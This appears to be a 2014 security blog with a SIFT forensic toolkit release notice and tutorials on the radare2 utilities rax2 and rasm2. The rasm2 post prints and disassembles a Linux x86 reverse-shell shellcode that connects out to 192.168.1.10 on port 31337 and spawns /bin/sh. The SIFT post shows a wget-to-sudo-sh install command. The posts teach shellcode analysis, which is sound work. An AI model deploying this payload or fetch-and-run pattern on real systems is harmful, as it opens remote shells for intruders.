Sunday, March 23, 2014

SIFT Workstation 3.0 has been released

SANS released their new, improved version of the SANS Investigate Forensic Toolkit (SIFT) workstation.

Key new features of SIFT 3.0 include:

Ubuntu LTS 12.04 Base
64 bit base system
Better memory utilization
Auto-DFIR package update and customizations
Latest forensic tools and techniques
VMware Appliance ready to tackle forensics
Cross compatibility between Linux and Windows
Option to install stand-alone via (.iso) or use via VMware Player/Workstation
Online Documentation Project at http://sift.readthedocs.org/
Expanded Filesystem Support

http://digital-forensics.sans.org/community/downloads

update:

You can also install it in your own. Download and install Ubuntu 12.04 LTS, and run the fullowing command:

wget --quiet -O - https://raw.github.com/sans-dfir/sift-bootstrap/master/bootstrap.sh | sudo sh -s -- -i -s -y

This will install SIFT on top of the OS.

Sunday, March 16, 2014

radare2 reverse engineering framework: rax2

rax2 utility comes along with the radare2 framework, and it's a simple conversion utility, it can convert between binary, decimal, hex, string, etc... You can find examples in the help menu for each option:

root@kali:~# rax2 -h
Usage: rax2 [options] [expression]
  int   ->  hex           ;  rax2 10
  hex   ->  int           ;  rax2 0xa
  -int  ->  hex           ;  rax2 -77
  -hex  ->  int           ;  rax2 0xffffffb3
  int   ->  bin           ;  rax2 b30
  bin   ->  int           ;  rax2 1010d
  float ->  hex           ;  rax2 3.33f
  hex   ->  float         ;  rax2 Fx40551ed8
  oct   ->  hex           ;  rax2 35o
  hex   ->  oct           ;  rax2 Ox12 (O is a letter)
  bin   ->  hex           ;  rax2 1100011b
  hex   ->  bin           ;  rax2 Bx63
  -e    swap endianness   ;  rax2 -e 0x33
  -b    binstr -> bin     ;  rax2 -b 01000101 01110110
  -s    hexstr -> bin     ;  rax2 -s 43 4a 50
  -S    bin -> hexstr     ;  rax2 -S C  J  P
  -v    version           ;  rax2 -V
  -x    hash string       ;  rax2 -x linux osx
  -k    keep base         ;  rax2 -k 33+3 -> 36
  -h    help              ;  rax2 -h


E.g.:

root@kali:~# rax2 0x33
51
root@kali:~# rax2 Fx33
51.000000f
root@kali:~# rax2 -b 01000101 01110110
Ev

root@kali:~# rax2 -s 43 4a 50
CJP

root@kali:~#

radare2 reverse engineering framework: rasm2

radare and the new radare2 are an open source reverse engineering framework, which can be found here:

http://radare.org/y/

It has quite a few tools, and the webpage has excellent documentation, which is pretty good. In this post I want to review the "rasm2" assembler / disassembler utility, which is one of the main tools in the package. It can work on hex streams, files, opcodes, etc... quite a few options, as we can see from the help:

root@kali:~# rasm2 -h
rasm2 [-e] [-o offset] [-a arch] [-s syntax] -d "opcode"|"hexpairs"|- [-f file ..]
 -d           Disassemble from hexpair bytes
 -D           Disassemble showing hexpair and opcode
 -f           Read data from file
 -F [in:out]  Specify input and/or output filters (att2intel, x86.pseudo, ...)
 -o [offset]  Set start address for code (0x08048000)
 -a [arch]    Set architecture plugin
 -b [bits]    Set architecture bits
 -s [syntax]  Select syntax (intel, att)
 -B           Binary input/output (-l is mandatory for binary input)
 -l [int]     Input/Output length
 -C           Output in C format
 -L           List supported asm plugins
 -e           Use big endian
 -v           Show version information
 If '-l' value is greater than output length, output is padded with nops
 If the last argument is '-' reads from stdin

Here are just a few random disassemble examples:

root@kali:~# rasm2 -d 90
nop
root@kali:~# rasm2 -d 53
push ebx
root@kali:~# rasm2 -d 44
inc esp


We can also reverse it:

root@kali:~# rasm2 "nop"
90
root@kali:~# rasm2 "nop;inc esp;push ebx"
904453


It supports quite a few formats:

root@kali:~# rasm2 -L
ad  arm       ARM disassembly plugin
ad  armthumb  ARM THUMB disassembly plugin
_d  avr       AVR Atmel disassembler
ad  bf        Brainfuck disassembly plugin
_d  csr       CSR disassembly plugin
ad  dalvik    Dalvik (Android VM) disassembly plugin
ad  java      Java CLASS assembler/disassembler
_d  mips      MIPS disassembly plugin
_d  msil      MSIL disassembly plugin
_d  ppc       PPC disassembly plugin
_d  sh        SH-4 disassembly plugin
_d  sparc     SPARC disassembly plugin
_d  x86       udis86 disassembly plugin
a_  x86.nz    x86 assembler with non-zeros
ad  x86.olly  X86 disassembly plugin (olly engine)


It's very useful for shellcode analysis. I took the following as an example:


Although the assembly is on the site, but rasm2 can also show it nicely:

root@kali:~# rasm2 -d 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268c0a8010a66687a696653fec389e16a10515689e1cd8031c9b103fec9b03fcd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0x66
mov bl, 0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx, esp
int 0x80
mov esi, eax
mov al, 0x66
xor ebx, ebx
mov bl, 0x2
push dword 0xa01a8c0
push word 0x697a
push bx
inc bl
mov ecx, esp
push 0x10
push ecx
push esi
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
dec cl
mov al, 0x3f
int 0x80
jnz 0x804803a
xor eax, eax
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx, esp
push edx
push ebx
mov ecx, esp
push edx
mov edx, esp
mov al, 0xb
int 0x80


We can also specify an offset if we now where the given command will be in memory:

root@kali:~# rasm2 -o 0x8048060 "call 0x09080706"
e8a1860301
root@kali:~# rasm2 -o 0x8048060 -d e8a1860301
call dword 0x9080706